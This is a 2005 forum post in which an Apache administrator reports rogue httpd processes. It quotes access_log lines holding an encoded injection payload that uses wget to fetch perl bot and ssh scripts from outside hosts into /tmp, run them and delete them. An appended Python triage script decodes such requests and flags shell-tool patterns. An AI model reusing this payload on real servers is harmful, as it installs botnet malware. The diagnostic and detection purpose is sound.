Apache Server configuration support - strange apache processes


Author strange apache processes
Khorne

2005-01-26, 7:55 am

Hi,


I work with Apache on Mandrake 10.1 and I found that Apache launches strange
processes.

Normal processes under Mandrake look like this:

httpd2 -f /etc/httpd/conf/httpd2.conf -DAPACHE2 -DHAVE_PHP4 -DHAVE_ACCESS -DHAVE ...

But a few minutes after starting Apache, Apache launches processes like this:
/usr/local/apache/bin/httpd -DSSL
/usr/local/apache/bin/httpd - D55L
/usr/local/apache/bin/httpd - D5SL

These processes don't stop when I stop Apache, and I can't restart Apache
until I kill them.
And of course there are no httpd files under the /usr/local/apache/bin/ directory.

I think it's a virus or a worm.

Below are a few lines from access_log:

127.0.0.1 - - [20/Jan/2005:09:52:07 +0100] "GET
/your_server_is_infected_by_shanty.html?iID=188& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/
.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%25
54%255F%2556%2541%2552%2553%255B%2572%25
75%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 404 364 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:52:12 +0100] "GET
/?t=13714& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3b
rm%2520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%2554%255F%2556%2541%2552%2553%255B
%2572%
2575%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET
/?t=6& rush=%2565%2563%2568%256F%2520%255F%2553
%2554%2541%2552%2554%255F%253B%2520cd%25
20/tmp%3bmkdir%2520.temp22%3bcd%2520.temp22%3bwget%2520http://www.quasi-sane.com/pics/bot.htm%3bwget%2520http://weblicious.com/.notes/ssh2.htm%3bperl%2520ssh2.htm%3brm%2
520ssh.htm%3bperl%2520bot.htm%3brm%2520bot. htm%253B%2520%2565%2563%2568%256F%2520%2
55F%2545%254E%2544%255F&highlight=%252527. %2570%2561%2573%2573%2574%2568%2572%2575
%2528%2524%2548%2554%2554%2550%255F%2547
%2545%2554%255F%2556%2541%2552%2553%255B
%2572%2575
%2573%2568%255D%2529.%252527'%3b
HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:12 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:45:13 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"
127.0.0.1 - - [20/Jan/2005:10:46:30 +0100] "GET / HTTP/1.1" 200 6980 "-"
"LWP::Simple/5.800"


Thanks for your help,


Khorne
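
An added example, not part of the original post: a log triage sketch that percent-decodes each request's query string until it stops changing, then flags the traits visible in the access_log excerpt above (nested encoding, a shell command chain, a Perl LWP client on loopback). The function names, the regex heuristics and the two sample lines are assumptions made for this example; the first sample is constructed by shortening the request pattern from the post.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>.+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')
# Heuristic (assumption): a shell separator followed by a common command name.
SHELL_RE = re.compile(r'[;|`]\s*(?:wget|curl|perl|sh|rm|mkdir|cd|echo)\b', re.I)
SCRIPTED_AGENT_RE = re.compile(r'^(?:LWP::|libwww-perl)', re.I)

def full_decode(value, max_rounds=5):
    """Percent-decode until the text stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect(line):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    _, _, query = m['uri'].partition('?')
    decoded, rounds = full_decode(query)
    reasons = []
    if rounds >= 2:
        reasons.append('nested percent-encoding')
    if SHELL_RE.search(decoded):
        reasons.append('shell command chain in query')
    if m['host'] in ('127.0.0.1', '::1') and SCRIPTED_AGENT_RE.match(m['agent']):
        reasons.append('scripted client on loopback')
    return {'host': m['host'], 'status': int(m['status']), 'rounds': rounds,
            'decoded_query': decoded, 'reasons': reasons}

# Constructed sample lines; the first is shortened from the pattern in the post.
SAMPLE = [
    '127.0.0.1 - - [20/Jan/2005:09:54:12 +0100] "GET /?t=6&rush=%2565%2563%2568%256F'
    '%2520%255F%2553%2554%2541%2552%2554%255F%253B%2520cd%2520/tmp%3bmkdir%2520.temp22'
    ' HTTP/1.1" 200 6980 "-" "LWP::Simple/5.800"',
    '192.0.2.10 - - [20/Jan/2005:10:45:12 +0100] "GET /index.php?q=hello%20world'
    ' HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for entry in SAMPLE:
        finding = inspect(entry)
        print(finding['reasons'], repr(finding['decoded_query']))
```

A status of 200 on a flagged request only means the server answered; whether the payload executed has to be confirmed from the process list and the filesystem.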





Copyright 2003 - 2008 webservertalk.com